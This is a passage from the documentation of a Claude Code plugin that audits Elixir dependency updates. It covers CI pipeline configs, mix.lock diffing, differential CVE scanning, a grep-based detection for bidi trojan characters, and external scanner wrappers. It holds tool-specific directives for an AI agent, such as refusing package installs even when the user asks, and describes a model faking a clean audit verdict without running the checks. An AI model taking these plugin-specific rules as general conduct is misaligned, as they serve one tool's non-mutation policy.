                  mix deps.get --only-prod
                  mix phx.deps_audit --ci --base main --sarif /tmp/audit.sarif
            - store_artifacts:
                path: /tmp/audit.sarif
                destination: phx-deps-audit-sarif
      workflows:
        pr:
          jobs: [deps-audit]
      ```
      
      CircleCI lacks a native SARIF surface but `store_artifacts` keeps the
      output downloadable. Pair with a separate job that posts a PR comment
      referencing the artifact URL.
      
      ## GitLab CI
      
      ```yaml
      deps-audit:
        stage: test
        image: hexpm/elixir:1.18.0-erlang-27.0.0-alpine-3.18.0
        before_script:
          - mix local.hex --force
          - mix deps.get --only-prod
        script:
          - mix phx.deps_audit --ci --base "${CI_DEFAULT_BRANCH}" --sarif audit.sarif
        artifacts:
          when: always
          paths: [audit.sarif]
          reports:
            sast: audit.sarif       # GitLab Ultimate SAST integration
      ```
      
      GitLab Ultimate accepts SARIF as a SAST report. For lower tiers, fall
      back to `artifacts.paths` and manual download.
      
      ## Drone CI
      
      ```yaml
      kind: pipeline
      type: docker
      name: deps-audit
      
      steps:
        - name: audit
          image: hexpm/elixir:1.18.0-erlang-27.0.0-alpine-3.18.0
          commands:
            - mix local.hex --force
            - mix deps.get --only-prod
            - mix phx.deps_audit --ci --base main --sarif audit.sarif
          when:
            paths:
              include: [mix.lock, mix.exs, hex_vet.exs]
      ```
      
      Drone has no built-in SARIF UI; pair with a Slack notification step
      that links to the run.
      
      ## Mix-task pattern (Phase 3+ companion)
      
      The `--ci` flag works with `/phx:deps-audit` inside Claude Code AND
      with the planned `mix phx.deps_audit` Mix task shipped by the
      companion `phx_deps_vet` Hex package. Both surfaces share the same
      exit-code rubric so CI workflows are portable between teams using
      CC and teams using the Mix task directly.
      
      Until the companion package ships, CI users run the audit via the
      Claude Code CLI:
      
      ```bash
      claude code -m "/phx:deps-audit --ci --base origin/main --sarif audit.sarif"
      ```
      
      This requires the runner has Claude Code installed and authenticated.
      For teams without that infrastructure, defer CI gating until the
      companion Mix task ships.
      
      ## `mix format` post-Write pattern for `.exs` data files
      
      Several workflows in this plugin scriptedly Write `.exs` files
      (`hex_vet.exs` ledger updates, `hex_vet_seed.exs` regen). The
      PostToolUse format hook in Claude Code rejects unformatted output —
      when CI scripts use `Code.format_string!` + `File.write!` to round-
      trip the file, the result still drifts from `mix format` if the
      `.formatter.exs` has unusual locals_without_parens or similar.
      
      Always run `mix format <path>` immediately after writing an `.exs`
      data file, before committing:
      
      ```bash
      mix run --no-mix-exs -e "..." # write the file via Code.format_string!
      mix format hex_vet.exs        # belt-and-braces project-formatter alignment
      git add hex_vet.exs
      ```
      
      This pattern recurs across `seed-regen.yml`, `cassette-regen.yml`,
      and any future regen workflow. Document it in those workflows'
      README sections.
      
      ## Flag matrix
      
      | Flag | CI use | Default |
      |------|--------|---------|
      | `--ci` | enable non-interactive mode | off |
      | `--sarif <path>` | emit SARIF 2.1.0 | off |
      | `--base <ref>` | diff against ref (Mode C) | `origin/main` in CI |
      | `--no-llm` | skip LLM triage | implied by `--ci` |
      | `--llm` | force LLM triage (override `--ci` default) | off |
      | `--no-differential` | disable Phase 2 NDJSON subtract | off |
      | `--json` | machine-readable stdout | implied by `--ci` |
      | `--strict` | promote all WARN to BLOCK | off |
      
      `--strict` is useful for "high-stakes deploy" pipelines: it makes any
      WARN finding exit-code-1. Most CI jobs leave it off and rely on
      `hex_vet.exs` `policy.block_on_unvetted: :strict` for gating instead.
      
    • diff-resolver.md 5.6 KB
      # Diff Resolver — Lock File Comparison
      
      Resolves `(pkg, old_version, new_version)` tuples for each mode.
      
      The plugin has no `lib/` directory, so this lives as shell + `mix run -e`
      snippets invoked from the skill body. Pseudocode is the spec; the snippets
      below are the runtime.
      
      ## Lock file format
      
      `mix.lock` is an Erlang term map:
      
      ```elixir
      %{
        "phoenix" => {:hex, :phoenix, "1.7.14", "checksum", :mix, [...], "hexpm", "hash"},
        "ecto" => {:hex, :ecto, "3.13.2", ...},
        ...
      }
      ```
      
      Position 3 (zero-indexed: 2) is the version string. The Erlang term format
      has been stable since Hex 0.20 (2019).
      
      ## Parsing — Elixir route (authoritative)
      
      Use `Code.eval_file/1` to get a proper map:
      
      ```bash
      mix run --no-deps-check --no-compile -e '
        lock = Code.eval_file("mix.lock") |> elem(0)
        for {pkg, tup} <- lock, do: IO.puts("#{pkg}\t#{elem(tup, 2)}")
      ' 2>/dev/null
      ```
      
      Output: tab-separated `pkg<TAB>version` lines. Reliable across all Hex
      versions. Requires the project to compile; for very early/broken states use
      the shell fallback below.
      
      > **Always redirect stderr.** Modern `mix.lock` files use quoted keys
      > (`"phoenix":`), so `Code.eval_file("mix.lock")` prints a
      > `found quoted keyword … please omit the quotes` **warning per
      > package** to stderr. On a 60-package lock that is tens of KB of
      > noise that gets persisted as an oversized tool result. The
      > `2>/dev/null` above is mandatory, not optional. **Never** inspect
      > the lock with `git diff … mix.lock | head` either — a real lock
      > diff is tens of KB and blows the tool-result budget; go straight to
      > `git show HEAD:mix.lock` + this parser.
      
      ## Parsing — Shell fallback (when Mix won't run)
      
      ```bash
      # Extract pkg + version pairs from raw mix.lock without mix
      awk -F'"' '/^  "/ {pkg=$2; getline; getline; if (match($0,/"[0-9][^"]+"/)) {print pkg"\t"substr($0,RSTART+1,RLENGTH-2)}}' mix.lock
      ```
      
      Approximate — works for vanilla `:hex` entries, may misparse `:git` /
      `:path` deps (which is fine, they're flagged by Rule 5 anyway).
      
      ## Mode B — working vs HEAD
      
      ```bash
      : "${AUDIT_TMPDIR:?AUDIT_TMPDIR not set — driver must establish per-run tmpdir}"
      
      git show HEAD:mix.lock > "${AUDIT_TMPDIR}/lock.old" 2>/dev/null \
        || echo '%{}' > "${AUDIT_TMPDIR}/lock.old"
      
      cp mix.lock "${AUDIT_TMPDIR}/lock.new"
      ```
      
      Then run the parser on both files and diff in Elixir:
      
      ```bash
      mix run --no-deps-check --no-compile -e '
        parse = fn path ->
          {map, _} = Code.eval_file(path)
          Map.new(map, fn {k, v} -> {k, elem(v, 2)} end)
        end
      
        old_map = parse.("${AUDIT_TMPDIR}/lock.old")
        new_map = parse.("${AUDIT_TMPDIR}/lock.new")
      
        changed = for {pkg, nv} <- new_map, ov = old_map[pkg], nv != ov, do: {pkg, ov, nv}
        added   = for {pkg, nv} <- new_map, !Map.has_key?(old_map, pkg), do: {pkg, nil, nv}
        removed = for {pkg, ov} <- old_map, !Map.has_key?(new_map, pkg), do: {pkg, ov, nil}
      
        IO.puts(Jason.encode!(%{changed: changed, added: added, removed: removed}))
      ' > ${AUDIT_TMPDIR}/diff.json
      ```
      
      If `Jason` isn't available (some early-stage projects), substitute
      `:erlang.term_to_binary` + Base64, or fall back to `inspect/2` and parse
      text.
      
      ## Mode C — `--base <ref>`
      
      Identical to Mode B but substitute the HEAD source:
      
      ```bash
      git show "${BASE_REF}:mix.lock" > ${AUDIT_TMPDIR}/lock.old 2>/dev/null \
        || { echo "ERROR: ${BASE_REF}:mix.lock not found"; exit 2; }
      ```
      
      Validate `<ref>` before use:
      
      ```bash
      git rev-parse --verify "${BASE_REF}^{commit}" >/dev/null 2>&1 \
        || { echo "ERROR: ${BASE_REF} is not a valid git ref"; exit 2; }
      ```
      
      ## Mode A — `--preview [pkg...]`
      
      Locked version = position 3 of the entry. Latest version = Hex API.
      
      ```bash
      # Locked side
      mix run --no-deps-check --no-compile -e '
        {map, _} = Code.eval_file("mix.lock")
        Map.new(map, fn {k, v} -> {k, elem(v, 2)} end)
        |> Jason.encode!()
        |> IO.puts()
      ' > ${AUDIT_TMPDIR}/lock.locked.json
      
      # Latest side — query Hex API for each requested package
      for pkg in "$@"; do
        curl -fsSL \
          -H "Accept: application/vnd.hex+json" \
          "https://hex.pm/api/packages/${pkg}" \
        | jq -r '.releases[0].version' \
        > "${AUDIT_TMPDIR}/${pkg}.latest"
      done
      ```
      
      Cap at 50 packages — warn and exit if `$#` > 50:
      
      ```bash
      if [ "$#" -gt 50 ]; then
        echo "WARN: --preview capped at 50 packages, got $#. Specify a subset."
        exit 2
      fi
      ```
      
      If no packages specified, expand to all keys from `mix.lock` (still capped).
      
      ## Output contract
      
      The resolver emits one JSON object to
      `${AUDIT_TMPDIR}/diff.json`:
      
      ```json
      {
        "mode": "B" | "C" | "A",
        "base": "HEAD" | "<ref>" | null,
        "changed": [["phoenix", "1.7.14", "1.7.20"], ...],
        "added":   [["new_pkg", null, "0.1.0"], ...],
        "removed": [["old_pkg", "1.2.3", null], ...]
      }
      ```
      
      Downstream steps (fetch, rule run, render) read this single file.
      
      ## Edge cases
      
      | Case | Behavior |
      |------|----------|
      | No `mix.lock` in HEAD (initial commit) | Treat all working entries as `added` |
      | Working `mix.lock` missing | ERROR — bail with `mix deps.get` suggestion |
      | `:git` entry in lock | Version is the SHA. Rule 5 flags it; diff still emits the tuple |
      | `:path` entry | Same as `:git` — flagged by Rule 5 |
      | Lockfile in conflict (`<<<<<<< HEAD`) | ERROR — refuse to audit, suggest resolving first |
      | Working ≡ HEAD (no changes) | Empty `changed/added/removed` arrays → renderer prints "No dep changes since HEAD" |
      
      ## Test fixtures
      
      `test/fixtures/deps-audit/lockfiles/` (created in Component 8):
      
      - `clean.lock` — no changes vs `clean.lock` (baseline)
      - `bump.lock` — single minor bump (`phoenix 1.7.14 → 1.7.20`)
      - `added.lock` — new package added
      - `git-dep.lock` — `:git` entry (triggers Rule 5)
      - `conflict.lock` — merge conflict markers (resolver should refuse)
      
    • differential-cve.md 5.6 KB
      # Differential CVE Pass
      
      Phase 5 capability. The audit runs external CVE scanners against both
      the OLD and NEW `mix.lock` and diffs the result, so the user learns
      **what each dep update actually patched** — not just "no current
      vulnerabilities."
      
      ## Why
      
      `mix_audit` only sees the current lock. If a 25-package update closes
      four CVEs disclosed in the last two weeks (real virgil example,
      2026-05-12), the user just sees "No vulnerabilities found" — and never
      learns they were exposed for up to 12 days. The differential pass
      turns that into a security changelog.
      
      ## Architecture
      
      ```
      mix_audit_diff (references/external-tools.md)
        ├─► run mix_audit against OLD mix.lock → cves_old.json
        └─► run mix_audit against NEW mix.lock → cves_new.json
                        │
                        ▼
               scripts/diff_cves.py
                        │
              ┌─────────┼──────────┐
              ▼         ▼          ▼
          patched  introduced  still_exposed
          (info)    (block)      (block)
                        │
                        ▼
             output-renderer.md headline:
             "🚨 N updates patched real CVEs"
      ```
      
      ## Lock-swap mechanics
      
      Three strategies considered. We use **tmpdir copy** (option b).
      
      | Option | Verdict |
      |--------|---------|
      | (a) `MIX_LOCKFILE` env var | Mix 1.18 has no such variable — rejected |
      | **(b) tmpdir copy** | Chosen — simplest, no git state mutation |
      | (c) `git worktree add` | Mutates `.git/`; branch state to clean up; rejected |
      
      Implementation in `_mix_audit_run_with_lock` (external-tools.md):
      
      ```bash
      tmpdir="$(mktemp -d -t deps-audit-XXXXXX)"
      cp mix.exs config/* "${tmpdir}/"
      cp "${OLD_LOCK_FILE}" "${tmpdir}/mix.lock"
      ( cd "${tmpdir}" && mix deps.audit --format json )
      rm -rf "${tmpdir}"
      ```
      
      Crucially, the real `mix.lock` is **never touched**. Iron Law #2
      (non-mutating) holds.
      
      `mix deps.audit` reads the lock and queries its locally-cached GHSA
      advisory DB. It does **not** require `mix deps.get` to run — the
      tmpdir copy works offline.
      
      ## CVE finding schema
      
      Each finding emitted by `diff_cves.py` (NDJSON, one per line):
      
      | Field | Type | Notes |
      |-------|------|-------|
      | `category` | `patched`/`introduced`/`still_exposed` | Set membership |
      | `rule_id` | `"ext:mix-audit:diff"` | Distinct from `ext:mix-audit` |
      | `severity` | `info`/`warn`/`block` | Per category × raw_severity |
      | `ghsa_id` | `GHSA-xxxx-xxxx-xxxx` | Primary key |
      | `cve_id` | `CVE-2026-12345` | Display only — may be absent |
      | `package` | `decimal` | Primary key |
      | `old_version` | `2.3.0` or `null` | Null when `introduced` |
      | `new_version` | `3.1.0` or `null` | Null when `patched` |
      | `severity_label` | `critical`/`high`/`moderate`/`low` | mix_audit raw |
      | `title` | `"DoS via unbounded exponent"` | From advisory |
      | `disclosed_at` | `"2026-05-07"` | ISO date or null |
      | `exposure_days` | `5` | `today - disclosed_at` |
      | `message` | `"decimal 2.3.0 → 3.1.0: CVE-... (high) — DoS"` | Pre-rendered |
      
      ## Severity per category
      
      | Category | Raw severity | Final |
      |----------|--------------|-------|
      | `patched` | (any) | `info` |
      | `introduced` | critical/high | `block` |
      | `introduced` | moderate | `warn` |
      | `still_exposed` | critical/high | `block` |
      | `still_exposed` | moderate | `warn` |
      
      `patched` is intentionally `info` — the update **is** the fix. The
      renderer (`output-renderer.md`) lifts these to the headline section
      despite their low severity, so the user sees the security changelog
      before any other report content.
      
      ## Set key
      
      `(ghsa_id, package)`. Version is deliberately NOT part of the key:
      a CVE that affected OLD `decimal 2.3.0` and ALSO affects NEW
      `decimal 2.4.0` is "still exposed" — the bump didn't address the CVE.
      
      When the GHSA advisory has no ID (rare), we fall back to the CVE ID.
      If neither is present, the entry is skipped (can't deduplicate).
      
      ## Caller flow
      
      Invoked by the audit driver after `mix_audit_run` (Step 4 of SKILL.md
      Execution Flow):
      
      ```bash
      # All artifacts live under ${AUDIT_TMPDIR} (per-run tmpdir established
      # by the driver — see references/audit-tmpdir.md). The driver's
      # `trap "rm -rf ${AUDIT_TMPDIR}" EXIT` removes everything on exit.
      
      # 1. Resolve OLD lock (Mode B: HEAD; Mode C: --base ref).
      git show "${BASE_REF:-HEAD}:mix.lock" > "${AUDIT_TMPDIR}/lock.old"
      
      # 2. Run mix_audit against both states (emits cves_old.json + cves_new.json).
      OLD_LOCK_FILE="${AUDIT_TMPDIR}/lock.old" \
      NEW_LOCK_FILE=mix.lock \
        mix_audit_diff
      
      # 3. Compute diff.
      python3 scripts/diff_cves.py \
        --old "${AUDIT_TMPDIR}/cves_old.json" \
        --new "${AUDIT_TMPDIR}/cves_new.json" \
        --out "${AUDIT_TMPDIR}/diff_cves.jsonl" \
        --summary
      
      # 4. Renderer reads diff_cves.jsonl, prepends the headline section
      #    when any patched/introduced/still_exposed findings exist.
      ```
      
      ## Disabling
      
      `--no-differential` skips the diff pass and runs only single-state
      `mix_audit_run` against the NEW lock (Phase 4 behavior). The CLI flag
      maps to setting `DIFFERENTIAL=0` in the driver.
      
      ## Failure modes
      
      | Failure | Behavior |
      |---------|----------|
      | OLD lock not in git (new project) | Skip diff; treat all NEW CVEs as `introduced` |
      | `mix_audit` not installed | Skip diff entirely (warn) |
      | Tmpdir copy fails (no disk) | Surface error; DO NOT fall back to mutating real lock |
      | GHSA cache stale | Emit freshness WARN; continue (results may miss new disclosures) |
      | OLD lock parse error | Skip diff; emit WARN |
      
      ## Related
      
      - `external-tools.md` — `mix_audit_run` wrapper + `mix_audit_diff` driver
      - `output-renderer.md` — security-changelog headline section
      - `differential.md` — Phase 2 native-rule differential (file-scoped, distinct from this CVE pass)
      - `../scripts/diff_cves.py` — the diff implementation
      
    • differential.md 6.7 KB
      # Differential mode — NDJSON set-subtract
      
      Phase 2 reduces the false-positive baseline by running each rule pass
      on the **OLD tarball** as well as the **NEW tarball**, then subtracting
      the findings that already existed in the dependency. Only the truly
      new signals reach the renderer at full severity.
      
      This isn't a function refactor — Phase 1's rules emit NDJSON to
      `findings.jsonl`. Differential mode runs them twice and diffs the
      output stream.
      
      ## Iron Laws
      
      1. **Set-subtract on findings, not source.** Diffing files would
         require AST normalization and is fragile. Diffing on finding keys
         is rule-aware and stable across reformatting.
      2. **Polymorphic keys, not a single tuple.** Three keying shapes
         covering all 8 rules — picking one universal key would have to
         degrade to "rule_id + everything," which is no key at all.
      3. **Carried-over signals are INFO, not silenced.** A finding that
         existed before AND still exists IS still real — it's just not
         the news. Downgrade severity, emit with `differential: carried`.
      4. **Cache invalidates on rule change.** The cache key MUST include a
         rules-checksum (`sha256` of `rules-impl.md` mtime + commit SHA).
         Otherwise a rule-semantics change leaves stale findings around.
      
      ## Architecture
      
      ```
      Phase 1 engine:    bash rules → findings.jsonl  on NEW
      
      Phase 2 engine:    bash rules → findings.jsonl       on NEW
                         bash rules → findings.old.jsonl   on OLD   ← new pass
                                             ↓
                         scripts/diff_findings.py
                                             ↓
                         new_signals.jsonl     (in NEW, not OLD)
                         info_signals.jsonl    (in both — downgraded)
                         dropped_signals.jsonl (in OLD, not NEW)
      ```
      
      ## Polymorphic keying
      
      Single-tuple keys are fragile because Phase 1 emits **two finding
      shapes** (file-scoped and package-scoped) and Rule 5 is its own
      thing. The differ keys per rule_id:
      
      | Rule kind | Rules | Key shape |
      |-----------|-------|-----------|
      | File-scoped | 1, 2, 3, 4, 7 | `(rule_id, file, fn_name, sha256(snippet)[:12])` |
      | Mix-deps diff | 5 | `(rule_id, dep_name, kind)` where kind ∈ {git, path} |
      | Package-scoped | 6, 8 | `(rule_id, pkg)` |
      
      ### `fn_name` extraction — AST walk, with a regex fallback
      
      For file-scoped rules, the snippet alone is insufficient because two
      identical snippets in different functions are different findings. The
      extraction walks the source upward from the finding's `line` to the
      nearest enclosing `def` / `defp` / `defmacro` / `defmacrop`:
      
      - **Preferred** — rule emitters call `Code.string_to_quoted/2` and
        attach `fn_name` to the JSON object before writing it. Phase 2's
        emit helper extends Phase 1's:
      
        ```bash
        fn_name_from_ast() {
          # $1 = file, $2 = line
          mix run --no-mix-exs -e "
            {:ok, ast} = File.read!(\"$1\") |> Code.string_to_quoted()
            # Walk AST collecting {fn_name, start_line, end_line}; return
            # the innermost named def enclosing line ${2}, or 'module_scope'.
            IO.write(MyDifferential.fn_name_for_line(ast, ${2}))
          "
        }
        ```
      
      - **Fallback** — `diff_findings.py` does a regex walk upward when
        `fn_name` is missing. Less accurate (won't see `defmacro` inside a
        `quote do`), but sufficient for first-pass stability.
      
      ### Why include `sha256(snippet)` in file-scoped keys?
      
      Functions get reformatted between releases — line numbers move, but
      the snippet text shifts less. Hashing 12 chars of the snippet gives
      us a stable identity even when the file is reformatted, while still
      distinguishing two `:erlang.binary_to_term(blob)` calls in different
      spots.
      
      ## Master-runner extension
      
      `run_all_rules` in `rules-impl.md` accepts an optional `OLD_DIR`
      environment variable. When set, every per-tarball rule (1, 2, 3, 4, 7)
      runs **twice** — once on `${new_dir}` writing `findings.jsonl`, once on
      `${old_dir}` writing `findings.old.jsonl`. Rule 5 already takes both
      dirs natively. Rules 6 and 8 (Hex API) are package-scoped and do not
      benefit from differential mode (the package itself is the unit).
      
      Once both NDJSON streams exist, the skill body invokes:
      
      ```bash
      python3 "${CLAUDE_SKILL_DIR}/scripts/diff_findings.py" \
          --new  "${AUDIT_TMPDIR}/findings.jsonl" \
          --old  "${AUDIT_TMPDIR}/findings.old.jsonl" \
          --new-out     "${AUDIT_TMPDIR}/new_signals.jsonl" \
          --info-out    "${AUDIT_TMPDIR}/info_signals.jsonl" \
          --dropped-out "${AUDIT_TMPDIR}/dropped_signals.jsonl"
      ```
      
      The renderer (see `output-renderer.md`) consumes `new_signals.jsonl`
      for the primary report. `info_signals.jsonl` is appended to a
      collapsible "carried-over risks" section. `dropped_signals.jsonl`
      informs the changelog-style "X risks resolved since previous version"
      line — useful as positive signal in PR review.
      
      ## Added-package mode
      
      A net-new dependency has no OLD tarball. The differ accepts
      `--added-package-mode emit-all` (default) and writes every finding to
      `new_signals.jsonl`. This matches Phase 1 behavior — a brand-new
      package gets the full audit.
      
      The alternative (`--added-package-mode skip`) is intentionally
      available but discouraged: skipping is the correct call only when the
      caller already knows the package was vetted at this version via
      `hex_vet.exs` (see `hex-vet.md`), and even then the ledger applies a
      downgrade rather than full skip.
      
      ## No persistent cache
      
      As of v2.12.0, the audit maintains no on-disk findings cache. Every run
      writes findings.jsonl / findings.old.jsonl / *_signals.jsonl into
      `${AUDIT_TMPDIR}` and the driver's EXIT trap removes everything when
      the audit completes. See `audit-tmpdir.md` for the full storage
      contract.
      
      This obsoletes earlier plans for `<rules-checksum>`-keyed cache
      directories and the `cache_signature.json` plugin-version-skew
      guard — without a persistent cache, neither problem exists. Every
      audit reflects the current rule set, current scorer, current GHSA
      advisories, and the current Hex API state.
      
      The latency cost is bounded: ~60-90s for a 25-package diff (per virgil
      dogfood), parallelized 4-way at the tarball fetcher. Re-auditing an
      unchanged lock is a rare workflow, so caching that case is low-value.
      
      ## When the differ is NOT used
      
      - `--no-differential` — debugging mode; emits Phase 1 findings.jsonl
        unchanged.
      - Single-version audit (no OLD ref, no `mix.lock` change). Differ
        falls back to added-package emit-all.
      
      ## Performance
      
      The differ is O(n + m) where n = NEW findings, m = OLD findings. With
      8 rules × ~5 findings per package per rule × 20 packages in a typical
      `mix.lock` PR, a deps PR is ~800 findings. Differ runs in <200 ms.
      
      Cost dominator is the **rule pass on OLD** — running rules 1-4 + 7
      twice per package roughly doubles the audit's wall time. Planned
      mitigation (Phase 3, not implemented): keep OLD findings cached and
      re-run only when the OLD tarball mtime changes.
      
    • execution-flow.md 5.7 KB
      # Execution Flow (Phase 5)
      
      Authoritative pacing for `/phx:deps-audit`. The SKILL.md "Execution Flow"
      section is a thin pointer; the runtime contract lives here.
      
      ## Default = full scan
      
      The default invocation runs **all 8 MVP rules** plus all available external
      tools (`mix hex.audit`, `mix_audit`, `osv-scanner`) plus Hex API enrichment
      plus the differential CVE pass.
      
      **There is no interactive choice prompt** — heuristics run by default.
      A "run heuristics?" prompt is a silent-failure footgun on large diffs:
      the user picks "no" to save time, the skill reports "no findings," and a
      bidi-char trojan lands in the lock with no warning.
      
      ```
      /phx:deps-audit          ← runs the full pipeline
      /phx:deps-audit --base main
      /phx:deps-audit --preview httpoison
      ```
      
      ## `--quick`: CVE + retirement only
      
      The opt-out is `--quick`. When set, the audit skips the 8 native rules,
      Hex API enrichment, and the differential CVE pass — keeping only:
      
      - `mix hex.audit` (retired-package check)
      - `mix_audit` (GHSA CVE check, current lock only)
      
      Use case: very large diffs (>50 packages), CI gates where wall-time
      matters more than novel-attack detection, or pre-PR triage where the
      maintainer just wants to confirm no known-CVE updates are merging dirty.
      
      Target latency on a 25-package update: **<10s**.
      
      ```
      /phx:deps-audit --quick
      ```
      
      Flag synonyms considered: `--cve-only`, `--no-heuristics`, `--fast`.
      **`--quick`** was chosen for brevity and cultural alignment with
      `mix test --quick`.
      
      ## Streaming progress
      
      The full scan emits one line per package per phase to stdout:
      
      ```
      [ 1/25] cowboy 2.13.0 — fetching tarball...
      [ 2/25] cowlib 2.15.0 — fetching tarball...
      ...
      [ 1/25] cowboy 2.13.0 — running rule 1 (bidi)...
      [ 1/25] cowboy 2.13.0 — running rule 2 (eval)...
      ...
      [ 1/25] cowboy 2.13.0 — Hex API: owners, downloads
      [12/25] decimal 3.1.0 — running rule 8 (typosquat)...
      [25/25] phoenix 1.8.7 — done (0 findings)
      ```
      
      Streaming progress is the default: facing a silent terminal for 60-90s,
      users assume the skill has hung and Ctrl-C before results come back.
      
      Format spec:
      
      - `[N/M]` — package counter (current/total), zero-padded to align
      - `pkg ver` — package name and NEW version
      - ` — ` em-dash separator
      - Phase verb in present continuous (`fetching`, `running`, `enriching`)
      - Phase noun (optional but encouraged)
      
      Render to stdout, not stderr, so the user sees it interactively but
      machine consumers (`--json`, `--sarif`) can suppress with `--quiet`.
      
      ## Suppressing progress
      
      | Flag | Effect |
      |------|--------|
      | `--quiet` | No streaming output; final result only |
      | `--json` | Implies `--quiet`; JSON to stdout |
      | `--sarif PATH` | Implies `--quiet`; SARIF to PATH |
      | `--ci` | Implies `--quiet`; exits non-zero on BLOCK |
      
      ## Phase ordering
      
      Default pipeline in order. Each step is independent and parallelism-safe
      unless noted.
      
      1. **Resolve diff** — `(pkg, old, new)` tuples from mix.lock pair
      2. **Fetch tarballs** — 4-way parallel; both OLD and NEW versions
      3. **Run 8 native rules** on NEW tarballs (per-package, parallel up to 4)
      4. **External CVE pass** — `mix_audit_diff` (OLD + NEW), then `diff_cves.py`
      5. **External retirement** — `mix hex.audit` (current lock)
      6. **Hex API enrichment** — owner, downloads, rule 6/8 (rate-limited 5/s)
      7. **`hex_vet.exs` ledger** — downgrade vetted versions to INFO
      8. **Differential native subtract** — Phase 2 `diff_findings.py`
      9. **LLM triage** (if score >10 per package) — `hex-deps-triager` agent
      10. **Render** — markdown table + sidecar JSON, with security-changelog headline
      
      `--quick` skips steps 1, 3, 5b, 6, 7, 8, 9 — keeping only steps 1-lite,
      2-lite (NEW only), 5a (`mix hex.audit`), 4-lite (`mix_audit` on NEW only,
      no diff), and 10-lite (no headline, just table).
      
      ## When to break from these defaults
      
      | Situation | Override |
      |-----------|----------|
      | CI gate, time-sensitive | `--quick --ci` |
      | Pre-merge PR review | (default — full scan) |
      | One-off package preview | `--preview pkg [pkg...]` (skips diff resolution) |
      | Already-vetted batch | Run normally; `hex_vet.exs` handles downgrades |
      | Air-gapped CI (no Hex API) | `--no-hex-api` (Phase 4 flag) |
      
      ## Wall-time budgets
      
      | Diff size | Default scan | `--quick` |
      |-----------|--------------|-----------|
      | 1-5 packages | 5-15s | <3s |
      | 10-25 packages | 30-90s | <10s |
      | 50-100 packages | 2-4 min | 15-30s |
      | 200+ packages | 5-10 min | <60s |
      
      Measured on a real 25-package update (~75s default) with the 4-way
      parallel fetcher.
      
      ## `--trace` flag (Iron Law #1 auditability)
      
      Without a trace there is a verification gap: when the audit
      reports "8 rules clean", there's no on-disk evidence the
      rules actually ran. The tmpdir is gone, no Bash trace is captured by
      ccrider, and a fast model could in principle synthesize a plausible
      verdict from the lock-diff text alone — exactly the Iron Law #1 false
      pass.
      
      `--trace` writes a verifiable audit log to
      `.claude/deps-audit/last-run.trace.log` documenting every shell command
      the audit ran (one per line, prefixed with timestamp + duration):
      
      ```
      2026-05-13T11:01:50.123Z [3.4s] mix hex.package fetch decimal 2.3.0 --unpack -o /tmp/phx-deps-audit-XXX/tarballs/decimal/2.3.0
      2026-05-13T11:01:53.501Z [3.1s] mix hex.package fetch decimal 2.4.1 --unpack -o /tmp/phx-deps-audit-XXX/tarballs/decimal/2.4.1
      2026-05-13T11:01:56.612Z [0.4s] grep -rP '[\x{202a}-\x{202e}\x{2066}-\x{2069}]' /tmp/phx-deps-audit-XXX/tarballs/decimal/2.4.1
      ...
      ```
      
      The trace file is the single piece of evidence that Iron Law #1 was
      upheld for a given run. It's not under `${AUDIT_TMPDIR}` — it survives
      audit completion so a reviewer can verify after the fact. The model
      SHOULD enable `--trace` by default when the gate hook is configured
      (`policy.exs` exists), and otherwise leave it opt-in.
      
    • external-tools.md 15.2 KB
      # External Tool Wrappers
      
      Three external CVE scanners layered on top of the 8 MVP rules. All optional
      except `mix hex.audit` (ships with mix). **Never install — even if asked.**
      Detect, warn with install instructions, skip cleanly.
      
      ## If the user asks "install mix_audit and re-run"
      
      **Refuse the install. Run the audit with what's available.**
      
      The audit skill is non-mutating. `mix.exs`, `mix.lock`, and the project
      build state must stay untouched. If the user explicitly requests an
      install, respond with the exact command for them to run, then continue
      the audit with `mix_audit` skipped:
      
      ```
      I can't install mix_audit — the audit skill is non-mutating and won't
      modify mix.exs/mix.lock. Run this yourself, then re-invoke me:
      
          mix deps.add mix_audit --only dev
          mix deps.get
      
      Meanwhile, I'll continue with mix_audit skipped. CVE coverage via GHSA
      will be missing for this run; mix hex.audit (retirement check) and the
      8 heuristic rules still cover novel-attack detection.
      ```
      
      This is consent-resistant by design — a skill that mutates the project
      "because the user asked" is indistinguishable, from a security review
      perspective, from one that mutates on its own. See SKILL.md Iron Law #2.
      
      ## 1. `mix hex.audit` — retired-package check
      
      Ships with Mix. Zero-config. Detects packages explicitly retired by their
      maintainers via Hex.pm (security, deprecated, invalid, renamed, etc.).
      
      ```bash
      hex_audit() {
        mix hex.audit 2>&1 | tee "${AUDIT_TMPDIR}/hex-audit.txt"
      }
      ```
      
      Output format (line per retirement):
      
      ```
      phoenix_html 2.14.3
        Reason: invalid
        Message: Upgrade to 4.x for new HTML escaping API
      ```
      
      Parse with awk:
      
      ```bash
      awk '
        /^[a-z_][a-z0-9_]* [0-9]/ { pkg=$1; ver=$2 }
        /Reason:/ { reason=$2 }
        /Message:/ { msg=substr($0, 11); print pkg"|"ver"|"reason"|"msg }
      ' "${AUDIT_TMPDIR}/hex-audit.txt"
      ```
      
      Severity mapping: `security` → BLOCK · `invalid` / `deprecated` / `renamed`
      → WARN.
      
      **FP rate:** ~0%. Always integrate.
      
      ## 2. `mix_audit` — CVE check via GitHub Advisory Database
      
      Hex package (`{:mix_audit, "~> 2.1", only: [:dev, :test], runtime: false}`).
      Checks GHSA `pkg:hex` advisories.
      
      ```bash
      mix_audit_run() {
        if ! mix help deps.audit >/dev/null 2>&1; then
          cat >&2 <<'EOF'
      WARN: mix_audit not installed — skipping CVE check via GHSA.
      
      To enable:
        mix archive.install hex mix_audit
        # or add to mix.exs:
        # {:mix_audit, "~> 2.1", only: [:dev, :test], runtime: false}
      EOF
          _mix_audit_warn_cve_corpus_overlap >&2 || true
          return 0
        fi
      
        local lock_file="${LOCK_FILE:-mix.lock}"
        local out_path="${MIX_AUDIT_OUT:-${AUDIT_TMPDIR:?AUDIT_TMPDIR not set}/mix-audit.json}"
      
        # GHSA freshness check (Phase 5). If the cache directory is >N hours
        # old, emit a WARN — recent disclosures may be missing. Threshold is
        # 24h by default; override via GHSA_MAX_AGE_HOURS.
        _mix_audit_check_ghsa_freshness >&2 || true
      
        # First `mix deps.audit` of a session triggers a full dependency
        # compile (`Compiling N files (.ex)` for every dep). This is
        # EXPECTED — `mix_audit` has `runtime: false` but `mix` still
        # ensures the dep tree is built. It is slow (tens of seconds) and
        # noisy, NOT a failure. Always send JSON to a file and only `tail`
        # stdout for the verdict; never echo the raw compile log.
      
        if [ "${lock_file}" = "mix.lock" ]; then
          # Fast path: scan the project as-is.
          mix deps.audit --format json 2>/dev/null > "${out_path}"
        else
          # Differential path: scan against a non-default lock. We MUST NOT
